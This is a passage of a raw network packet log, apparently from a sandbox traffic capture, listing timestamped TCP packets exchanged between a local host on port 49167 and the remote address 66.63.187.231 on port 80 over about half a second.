                                                Nov 20, 2024 10:11:13.592293024 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.592308044 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.592320919 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.592363119 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.592669010 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.592725039 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.593163013 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.593173981 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.593185902 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.593216896 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.593230963 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.593449116 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.593502998 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.594075918 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.594089031 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.594099998 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.594136000 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.594149113 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.596388102 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.596450090 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.598613024 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.598634005 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.598692894 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.730685949 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.730741978 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.730753899 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.730901957 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.730907917 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.730907917 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.730916977 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.730931044 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.730950117 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.730972052 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.731605053 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.731620073 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.731632948 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.731662035 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.731678009 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.731771946 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.731784105 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.731796026 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.731827974 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.731844902 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.732058048 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732110977 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.732249975 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732264042 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732306004 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.732604027 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732616901 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732629061 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732645035 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.732660055 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.732676983 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.733108997 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733164072 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.733397007 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733408928 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733454943 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.733468056 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.733599901 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733613014 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733625889 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733639002 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.733658075 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.733673096 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.734364033 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734390020 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734401941 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734422922 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.734483957 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.734791994 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734805107 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734817982 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734829903 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.734849930 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.734862089 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.735330105 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735387087 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.735433102 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735446930 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735483885 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.735501051 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.735774994 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735788107 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735799074 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735815048 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.735836983 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.735852957 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738312006 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738329887 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738369942 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738389015 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738430023 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738442898 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738526106 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738624096 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738635063 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738646984 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738679886 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738694906 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738791943 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738845110 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.738876104 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.738925934 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.739037991 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.739093065 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.866667032 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.866764069 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.866796017 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.866849899 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.866878986 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.866913080 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.866913080 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.866913080 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867014885 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867047071 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867050886 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867070913 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867088079 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867094040 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867129087 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867280960 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867330074 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867336035 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867369890 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867846012 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867880106 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867903948 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867913961 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867917061 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.867949009 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867981911 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.867993116 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868016005 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868022919 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868052006 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868060112 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868089914 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868573904 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868607044 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868630886 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868643999 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868668079 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868705034 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868737936 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868753910 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868755102 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.868792057 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.868837118 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869139910 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.869174004 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.869198084 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869206905 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.869218111 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869240999 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.869247913 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869276047 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.869282007 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869309902 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.869318008 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869349003 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.869966984 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870022058 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870026112 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870057106 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870101929 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870101929 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870131969 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870138884 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870146990 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870182991 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870193005 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870217085 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870256901 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870850086 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870884895 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870907068 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870918989 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870929956 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870954037 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870961905 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.870987892 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.870996952 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871025085 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871031046 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871057987 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871064901 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871102095 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871769905 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871804953 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871838093 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871838093 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871855021 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871872902 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871882915 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871906996 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871915102 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871942043 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871948004 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.871975899 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.871984959 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872015953 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872673988 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.872709036 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.872735977 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872741938 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.872751951 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872777939 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.872786045 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872812986 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.872818947 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872848034 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.872853041 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.872888088 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.873661041 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.873709917 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.873743057 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.873748064 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.873765945 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.873778105 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.873784065 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.873806953 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.873855114 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.873910904 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.873981953 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874017000 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874036074 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874059916 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874260902 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874294043 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874317884 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874327898 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874341011 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874362946 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874386072 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874403954 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874702930 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874732018 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874764919 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874766111 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874778032 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874813080 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874885082 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874917984 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.874933958 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.874965906 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875138044 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875171900 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875195026 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875205040 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875217915 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875246048 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875258923 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875300884 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875603914 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875637054 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875660896 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875669956 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875675917 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875705004 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875713110 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875739098 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875746012 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875772953 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875808001 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875817060 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875842094 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.875847101 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.875886917 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.876493931 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.876548052 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.876554012 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.876581907 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.876595020 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.876617908 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.953434944 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.953469992 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.953481913 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.953520060 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.953546047 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.953651905 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.953694105 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010340929 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010390997 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010428905 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010565996 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010566950 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010740995 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010776043 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010802984 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010809898 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010818005 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010843992 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010848045 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010885000 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010898113 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010930061 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010941029 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010962963 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.010967970 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.010993004 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011003971 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011027098 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011034012 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011065006 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011077881 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011111975 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011116982 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011147022 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011152029 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011181116 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011185884 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011215925 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011223078 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011250973 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011254072 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011286974 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011292934 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011326075 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011356115 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011389017 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011400938 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011421919 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011426926 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011456013 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011461973 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011490107 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011495113 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011524916 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011528969 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011558056 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.011564016 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.011596918 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.012800932 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.012836933 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.012870073 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.012870073 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.012887001 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.012904882 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.012916088 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.012942076 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.012950897 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.012976885 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.012988091 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013076067 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013082981 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013117075 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013151884 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013168097 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013169050 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:14.013201952 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:14.013207912 CET4916780192.168.2.2266.63.187.231
